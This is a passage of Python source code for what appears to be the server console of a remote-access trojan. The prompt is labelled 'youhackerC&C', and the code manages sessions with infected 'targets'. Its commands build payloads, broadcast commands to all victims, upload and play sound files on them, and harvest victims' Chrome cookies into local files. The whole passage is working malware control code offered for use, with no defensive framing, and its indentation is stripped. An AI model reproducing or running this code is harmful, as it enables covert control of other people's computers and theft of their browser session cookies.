print("[-] File Not Found")
elif command[:5] == 'start':
print(target.recv(1024).decode())
elif command[:9] == 'playsound':
if command[10:][-4:] != '.wav':
target.send('nsupport'.encode())
print(target.recv(1024).decode())
else:
target.send('supported'.encode())
print("[*] Uploading Wav File to the Target")
try:
upload_file(target,command[10:])
except:
print("[-] Failed Uploading The File")
else:
print("[+] Wav File Started")
elif command[:11]== "Get-Cookies":
username = target.recv(1024).decode()
with open("Chrome-"+username+".txt",'w') as cookeis:
cookeis.write(reliable_recv(target))
cookeis.close()
print("Cookies Saved As Chrome-"+username+".txt")
else:
result = reliable_recv(target)
print(result)
except:
targets.remove(target)
ips.remove(ip)
users.remove(users[num])
print("[-] session lost")
def accept_connections():
global clients
global user
while True:
if stop_flag:
break
sock.settimeout(1)
try:
target, ip = sock.accept()
key = open('key.txt', 'r').read()
cred = target.recv(1024).decode().split(':')
user = cred[1]
if cred[0]== key and user not in users:
users.append(user)
targets.append(target)
ips.append(ip)
print((str(ip) + ' has connected!'))
cur = os.getcwd()
path = 'sounds'
os.chdir(path)
playsound.playsound("jarbou3.wav", True)
clients += 1
os.chdir(cur)
else:
reliable_send(target,"quit")
pass
except:
pass
clients = 0
users = []
targets = []
ips = []
stop_flag = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = open('serverport.txt', 'r').read()
sock.bind(('', int(p)))
sock.listen(5)
t1 = threading.Thread(target=accept_connections)
t1.start()
banner()
print('[+] Waiting For The Incoming Connections ...')
while True:
command = input('youhackerC&C: ')
if command == 'hacked':
counter = 0
for ip in ips:
print('Session ' + str(counter) + ' --- ' + str(ip))
counter += 1
elif command == 'clear':
os.system(clear)
elif command[:7] == 'connect':
try:
global num
num = int(command[8:])
tarnum = targets[num]
tarip = ips[num]
target_communication(tarnum, tarip)
except:
print('[-] No Session for that number or session lost')
elif command == 'help':
print("""
banner --> print the banner
build --> build payload
connect --> connect to target
sendall --> send command to all targets
hacked --> see connected targets
exit --> exit the C&C
kill --> kill session
rmlist --> remove disconnected target from list
clear --> clear the screen
""")
elif command == 'banner':
banner()
elif command == 'build':
if platform.system() == "Windows":
checkreqwin()
build()
else:
build()
elif command[:6] == 'rmlist':
try:
targ = targets[int(command[7:])]
ip = ips[int(command[7:])]
targets.remove(targ)
ips.remove(ip)
users.remove(users[int(command[7:])])
except:
print('This session not Available')
elif command == 'exit':
for target in targets:
reliable_send(target, 'quit')
target.close()
sock.close()
stop_flag = True
t1.join()
break
elif command == 'clear':
os.system(clear)
elif command[:4] == 'kill':
targ = targets[int(command[5:])]
ip = ips[int(command[5:])]
reliable_send(targ, 'quit')
targ.close()
targets.remove(targ)
ips.remove(ip)
users.remove(int(command[5:]))
elif command[:7] == 'sendall':
x = len(targets)
i = 0
try:
while i < x:
tarnumber = targets[i]
print("executed on "+str(ips[i][0]))
reliable_send(tarnumber, command)
i += 1
except Exception as E:
print(str(E))
print('Failed')
else:
print('[!!] Command Doesnt Exist')